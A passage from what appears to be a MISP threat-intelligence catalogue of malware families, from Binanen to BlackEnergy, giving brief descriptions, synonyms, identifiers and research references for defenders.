- https://securelist.com/versatile-ddos-trojan-for-linux/64361/ - webarchive
- https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server - webarchive
- https://thisissecurity.stormshield.com/2015/09/30/when-elf-billgates-met-windows/ - webarchive
- https://habrahabr.ru/post/213973/ - webarchive
- https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/ - webarchive
- https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Binanen
Binanen is a dropper that drops and executes a section of itself into a hidden dummy process. According to F-Secure, it executes command-line tools such as asipconfig, which is useful for retrieving the network configuration. The malware aims to steal information about the machine, the username and installed software and, more generally speaking, can potentially carry out further actions on the compromised machine.
Internal MISP references
UUID a76a35e4-6ef7-45ad-9656-98584835d910
which can be used as unique global reference for Binanen
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BioData
Internal MISP references
UUID 96bcaa83-998b-4fb2-a4e7-a2d33c6427d7
which can be used as unique global reference for BioData
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.biodata - webarchive
- https://unit42.paloaltonetworks.com/unit42-recent-inpage-exploits-lead-multiple-malware-families/ - webarchive
- https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/ - webarchive
- https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/ - webarchive
- https://securelist.com/inpage-zero-day-exploit-used-to-attack-financial-institutions-in-asia/76717/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
bioload
Internal MISP references
UUID 04803315-fc17-44d0-839e-534b9da4c7fc
which can be used as unique global reference for bioload
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BIOPASS
BIOPASS RAT is a malware family which targets online gambling companies in China by leveraging a watering hole attack. This Remote Access Trojan (RAT) is unique in that it leverages the Open Broadcaster Software (OBS) framework to monitor the user's screen.
Internal MISP references
UUID f3cdfef4-7976-42f9-8b5e-a67d4a62b5c1
which can be used as unique global reference for BIOPASS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.biopass - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf - webarchive
- https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Biscuit
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Biscuit.
Known Synonyms |
---|
zxdosml |
Internal MISP references
UUID f98b4092-5f32-407c-9015-2da787d70c64
which can be used as unique global reference for Biscuit
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BISTROMATH
Internal MISP references
UUID fa8b2a91-ec55-41cc-b5f6-3d233cc3cc65
which can be used as unique global reference for BISTROMATH
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bistromath - webarchive
- https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/ - webarchive
- https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/ - webarchive
- https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/ - webarchive
- https://www.us-cert.gov/ncas/analysis-reports/ar20-045a - webarchive
- https://ti.qianxin.com/blog/articles/Analysis-of-attacks-by-Lazarus-using-Daewoo-shipyard-as-bait/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BitPyLock
Bitpylock is a ransomware that encrypts files using asymmetric keys and appends the '.bitpy' suffix once the encryption phase has ended. The ransom note appears on the affected user's Desktop with the following name: "# # HELP_TO_DECRYPT_YOUR_FILES # .html". At the time of writing the ransom request is 0.8 BTC and the communication email is: helpbitpy@cock.li.
Internal MISP references
UUID da5adcc1-9adc-4e86-9034-08aafecc14c1
which can be used as unique global reference for BitPyLock
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bitpylock - webarchive
- https://twitter.com/malwrhunterteam/status/1215252402988822529 - webarchive
- https://www.bleepingcomputer.com/news/security/bitpylock-ransomware-now-threatens-to-publish-stolen-data/ - webarchive
- https://yomi.yoroi.company/report/5e1d77b371ef016089703d1a/5e1d79d7d1cc4993da62f24f/overview - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BITSloth
Internal MISP references
UUID 5297e3aa-6fe8-469c-8890-9c4ecff2a57f
which can be used as unique global reference for BITSloth
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bitsran
SHADYCAT is a dropper and spreader component for the HERMES 2.1 RANSOMWARE radical edition.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bitsran.
Known Synonyms |
---|
SHADYCAT |
Internal MISP references
UUID 3e072464-6fa6-4977-9b64-08f86d1062fc
which can be used as unique global reference for Bitsran
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran - webarchive
- https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug-180129.pdf - webarchive
- https://content.fireeye.com/apt/rpt-apt38 - webarchive
- http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bitter RAT
Internal MISP references
UUID 265f96d1-fdd4-4dec-b7ca-51ae6f726634
which can be used as unique global reference for Bitter RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat - webarchive
- https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan - webarchive
- https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/ - webarchive
- https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/ - webarchive
- https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf - webarchive
- https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/ - webarchive
- https://blog.strikeready.com/blog/dont-get-bitter-about-being-targeted--fight-back-with-the-help-of-the-community./ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BitRAT
According to Bitdefender, BitRAT is a notorious remote access trojan (RAT) marketed on underground cybercriminal web markets and forums. Its price tag of $20 for lifetime access makes it irresistible to cybercriminals and helps the malicious payload spread.
Furthermore, each buyer’s modus operandi makes BitRAT even harder to stop, considering it can be employed in various operations, such as trojanized software, phishing and watering hole attacks.
BitRAT’s popularity arises from its versatility. The malicious tool can perform a wide range of operations, including data exfiltration, UAC bypass, DDoS attacks, clipboard monitoring, gaining unauthorized webcam access, credential theft, audio recording, XMRig coin mining and generic keylogging.
Internal MISP references
UUID 8c4363f4-4f38-4a5a-bc87-16f0721bd03b
which can be used as unique global reference for BitRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat - webarchive
- https://www.bitdefender.com/blog/hotforsecurity/bitrat-malware-seen-spreading-through-unofficial-microsoft-windows-activators/ - webarchive
- https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/ - webarchive
- https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware - webarchive
- https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html - webarchive
- https://www.youtube.com/watch?v=CYm3g4zkQdw - webarchive
- https://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business/ - webarchive
- https://community.riskiq.com/article/ade260c6 - webarchive
- https://securityintelligence.com/posts/roboski-global-recovery-automation/ - webarchive
- https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf - webarchive
- https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities - webarchive
- https://blog.qualys.com/vulnerabilities-threat-research/2023/01/03/bitrat-now-sharing-sensitive-bank-data-as-a-lure - webarchive
- https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 - webarchive
- https://www.ciphertechsolutions.com/roboski-global-recovery-automation/ - webarchive
- https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf - webarchive
- https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/ - webarchive
- https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html - webarchive
- https://asec.ahnlab.com/en/32781/ - webarchive
- https://isc.sans.edu/forums/diary/A+Zip+Bomb+to+Bypass+Security+Controls+Sandboxes/28670/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
- https://www.fortinet.com/blog/threat-research/nft-lure-used-to-distribute-bitrat - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt - webarchive
- https://krabsonsecurity.com/2020/08/22/bitrat-the-latest-in-copy-pasted-malware-by-incompetent-developers/ - webarchive
- https://www.bleepingcomputer.com/news/security/bitrat-malware-now-spreading-as-a-windows-10-license-activator/ - webarchive
- https://forensicitguy.github.io/hcrypt-injecting-bitrat-analysis/ - webarchive
- https://github.com/Finch4/Malware-Analysis-Reports/blob/main/13e0f258cfbe3aece8a7e6d29ceb5697/README.md - webarchive
- https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bizzaro
Kaspersky Labs characterizes Bizarro as yet another banking Trojan family originating from Brazil that is now found in other regions of the world. They have seen users being targeted in Spain, Portugal, France and Italy. Attempts have now been made to steal credentials from customers of 70 banks from different European and South American countries.
Internal MISP references
UUID 00fb2087-7e08-4649-ac93-9547deda7aca
which can be used as unique global reference for Bizzaro
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BKA Trojaner
BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in the German language.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BKA Trojaner.
Known Synonyms |
---|
bwin3_bka |
Internal MISP references
UUID ea06f87c-148c-49e5-afec-7012cb2b4f0a
which can be used as unique global reference for BKA Trojaner
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Black Basta (Windows)
"Black Basta" is a new ransomware strain discovered in April 2022 that appears to have been in development since at least early February 2022. Given their ability to quickly amass new victims and the style of their negotiations, this is likely not a new operation but rather a rebrand of a previous top-tier ransomware gang that brought along its affiliates.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Black Basta (Windows).
Known Synonyms |
---|
no_name_software |
Internal MISP references
UUID ada47367-7e69-4122-b5c1-4e5aeb54f922
which can be used as unique global reference for Black Basta (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbasta - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a - webarchive
- https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/ - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v - webarchive
- https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis - webarchive
- https://securityintelligence.com/x-force/spam-trends-campaigns-senior-superlatives-2023/ - webarchive
- https://quadrantsec.com/resource/technical-analysis/black-basta-malware-overview - webarchive
- https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware - webarchive
- https://www.bleepingcomputer.com/news/security/american-dental-association-hit-by-new-black-basta-ransomware/ - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://stairwell.com/resources/stairwell-threat-report-black-basta-overview-and-detection-rules/ - webarchive
- https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html - webarchive
- https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies - webarchive
- https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ - webarchive
- https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/ - webarchive
- https://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/ - webarchive
- https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/ - webarchive
- https://gbhackers.com/black-basta-ransomware/ - webarchive
- https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html - webarchive
- https://www.youtube.com/watch?v=iD_KZAqNDZ0 - webarchive
- https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023 - webarchive
- https://www.bleepingcomputer.com/news/security/new-black-basta-ransomware-springs-into-action-with-a-dozen-breaches/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/ - webarchive
- https://securityintelligence.com/posts/black-basta-ransomware-group-besting-network/ - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight - webarchive
- https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/ - webarchive
- https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html - webarchive
- https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta - webarchive
- https://www.reliaquest.com/blog/qbot-black-basta-ransomware/ - webarchive
- https://securelist.com/luna-black-basta-ransomware/106950 - webarchive
- https://securityscorecard.com/research/a-deep-dive-into-black-basta-ransomware - webarchive
- https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/ - webarchive
- https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware - webarchive
- https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape - webarchive
- https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ - webarchive
- https://securityscorecard.pathfactory.com/all/a-deep-dive-into-bla - webarchive
- https://symantec-enterprise-blogs.security.com/threat-intelligence/black-basta-ransomware-zero-day - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta - webarchive
- https://www.zscaler.com/blogs/security-research/back-black-basta - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackByte
Ransomware that uses a dropper written in JavaScript to deploy a .NET payload.
Internal MISP references
UUID c7732221-fbb3-4469-a1c6-260a825b290a
which can be used as unique global reference for BlackByte
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbyte - webarchive
- https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/ - webarchive
- https://blog.talosintelligence.com/blackbyte-blends-tried-and-true-tradecraft-with-newly-disclosed-vulnerabilities-to-support-ongoing-attacks/ - webarchive
- https://de.darktrace.com/blog/detecting-the-unknown-revealing-uncategorised-ransomware-using-darktrace - webarchive
- https://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants - webarchive
- https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/ - webarchive
- https://www.ic3.gov/Media/News/2022/220211.pdf - webarchive
- https://redcanary.com/blog/blackbyte-ransomware/ - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf - webarchive
- https://therecord.media/san-francisco-49ers-confirm-ransomware-attack/ - webarchive
- https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups - webarchive
- https://www.bleepingcomputer.com/news/security/fbi-blackbyte-ransomware-breached-us-critical-infrastructure/ - webarchive
- https://securelist.com/modern-ransomware-groups-ttps/106824/ - webarchive
- https://www.trendmicro.com/vinfo/my/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/ - webarchive
- https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape - webarchive
- https://news.sophos.com/en-us/2022/10/04/blackbyte-ransomware-returns/ - webarchive
- https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group - webarchive
- https://blog.talosintelligence.com/2022/05/the-blackbyte-ransomware-group-is.html - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-analysis-and-protections-for-blackbyte-ransomware.html - webarchive
- https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape - webarchive
- https://www.picussecurity.com/resource/ttps-used-by-blackbyte-ransomware-targeting-critical-infrastructure - webarchive
- https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt - webarchive
- https://twitter.com/splinter_code/status/1628057204954652674 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackCat (Windows)
ALPHV, also known as BlackCat or Noberus, is a ransomware family that is deployed as part of Ransomware as a Service (RaaS) operations. ALPHV is written in the Rust programming language and supports execution on Windows, Linux-based operating systems (Debian, Ubuntu, ReadyNAS, Synology), and VMWare ESXi. ALPHV is marketed as ALPHV on cybercrime forums, but is commonly called BlackCat by security researchers due to an icon of a black cat appearing on its leak site. ALPHV has been observed being deployed in ransomware attacks since November 18, 2021.
ALPHV can be configured to encrypt files using either the AES or ChaCha20 algorithm. To maximize the amount of ransomed data, ALPHV can delete volume shadow copies, stop processes and services, and stop virtual machines on ESXi servers. ALPHV can self-propagate by using PsExec to remotely execute itself on other hosts on the local network.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BlackCat (Windows).
Known Synonyms |
---|
ALPHV |
Noberus |
Internal MISP references
UUID 44109c47-f4ab-41c0-8d18-b93e7dcd8e42
which can be used as unique global reference for BlackCat (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcat - webarchive
- https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/ - webarchive
- https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor - webarchive
- https://killingthebear.jorgetesta.tech/actors/alphv - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v - webarchive
- https://unit42.paloaltonetworks.com/blackcat-ransomware/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022 - webarchive
- https://www.intrinsec.com/alphv-ransomware-gang-analysis - webarchive
- https://securityintelligence.com/posts/blackcat-ransomware-levels-up-stealth-speed-exfiltration/ - webarchive
- https://www.infinitumit.com.tr/en/black-cat-alphv-ransomware-group/ - webarchive
- https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf - webarchive
- https://cocomelonc.github.io/book/2023/12/13/malwild-book.html - webarchive
- https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html - webarchive
- https://www.varonis.com/blog/alphv-blackcat-ransomware - webarchive
- https://x.com/vxunderground/status/1731138180672344095?t=reBMQQFFMGQ_zkV8KmL_LA&s=01 - webarchive
- https://mssplab.github.io/threat-hunting/2023/07/13/malware-analysis-blackcat.html - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://www.s-rminform.com/cyber-intelligence-briefing/exmatter-malware-levels-up - webarchive
- https://blog.group-ib.com/blackcat - webarchive
- https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/ - webarchive
- https://github.com/rivitna/Malware/tree/main/BlackCat/ALPHV3 - webarchive
- https://id-ransomware.blogspot.com/2021/12/blackcat-ransomware.html - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware - webarchive
- https://blog.sekoia.io/scattered-spider-laying-new-eggs/ - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ - webarchive
- https://www.crowdstrike.com/blog/anatomy-of-alpha-spider-ransomware/ - webarchive
- https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/ - webarchive
- https://securelist.com/modern-ransomware-groups-ttps/106824/ - webarchive
- https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/ - webarchive
- https://www.trellix.com/about/newsroom/stories/research/scattered-spider-the-modus-operandi/ - webarchive
- https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023 - webarchive
- https://securityscorecard.com/blog/ttps-associated-with-new-version-of-blackcat-ransomware - webarchive
- https://www.mandiant.com/resources/blog/alphv-ransomware-backup - webarchive
- https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group - webarchive
- https://github.com/f0wl/blackCatConf - webarchive
- https://www.ic3.gov/Media/News/2022/220420.pdf - webarchive
- https://community.riskiq.com/article/47766fbd - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a - webarchive
- https://www.microsoft.com/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/ - webarchive
- https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809 - webarchive
- https://securelist.com/a-bad-luck-blackcat/106254/ - webarchive
- https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf - webarchive
- https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html - webarchive
- https://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware - webarchive
- https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/ - webarchive
- https://www.trendmicro.com/en_us/research/22/d/an-investigation-of-the-blackcat-ransomware.html - webarchive
- https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous - webarchive
- https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware - webarchive
- https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive - webarchive
- https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware - webarchive
- https://www.intrinsec.com/alphv-ransomware-gang-analysis/ - webarchive
- https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/ - webarchive
- https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/ - webarchive
- https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/ - webarchive
- https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack - webarchive
- http://www.microsoft.com/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html - webarchive
- https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape - webarchive
- https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf - webarchive
- https://www.theregister.com/2023/11/16/blackcat_ransomware_luring_corporate_targets/ - webarchive
- https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BLACKCOFFEE
A backdoor that obfuscates its communications as normal traffic to legitimate websites such as GitHub and Microsoft's TechNet portal.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BLACKCOFFEE.
Known Synonyms |
---|
PNGRAT |
ZoxPNG |
gresim |
Internal MISP references
UUID ff660bf2-a9e4-4973-be0c-9f6618e40899
which can be used as unique global reference for BLACKCOFFEE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee - webarchive
- https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html - webarchive
- https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-keystone - webarchive
- https://attack.mitre.org/groups/G0025/ - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- http://malware-log.hatenablog.com/entry/2015/05/18/000000_1 - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-mohawk - webarchive
- https://attack.mitre.org/groups/G0001/ - webarchive
- https://www.youtube.com/watch?v=NFJqD-LcpIg - webarchive
- https://intrusiontruth.wordpress.com/2019/07/24/apt17-is-run-by-the-jinan-bureau-of-the-chinese-ministry-of-state-security/ - webarchive
- http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf - webarchive
- https://attack.mitre.org/software/S0069/ - webarchive
- https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackEnergy
BlackEnergy, whose first version is shortened to BE1, started as crimeware sold in the Russian cyber underground as early as 2007. Initially it was designed as a toolkit for creating botnets to conduct DDoS attacks. It supported a variety of flooding commands covering protocols such as ICMP, TCP SYN, UDP, HTTP and DNS. Among the high-profile targets of cyber attacks utilising BE1 were a Norwegian bank and government websites in Georgia three weeks before the Russo-Georgian War.
Version 2 of BlackEnergy, BE2, came in 2008 with a complete code rewrite that introduced a protective layer, a kernel-mode rootkit and a modular architecture. Plugins included mostly DDoS attacks, a spam plugin and two banking authentication plugins to steal from Russian and Ukrainian banks. The banking plugin was paired with a module designed to destroy the filesystem. Moreover, BE2 was able to:
- download and execute a remote file;
- execute a local file on the infected computer;
- update the bot and its plugins.
The Industrial Control Systems Cyber Emergency Response Team issued an alert warning that BE2 was leveraging the human-machine interfaces of industrial control systems like GE CIMPLICITY, Advantech/Broadwin WebAccess, and Siemens WinCC to gain access to critical infrastructure networks.
In 2014, the BlackEnergy toolkit, BE3, switched to a lighter footprint with no kernel-mode driver component. Its plugins included:
- operations on the victim's filesystem
- spreading with a parasitic infector
- spying features like keylogging, screenshots or a robust password stealer
- TeamViewer and a simple pseudo "remote desktop"
- listing Windows accounts and scanning the network
- destroying the system
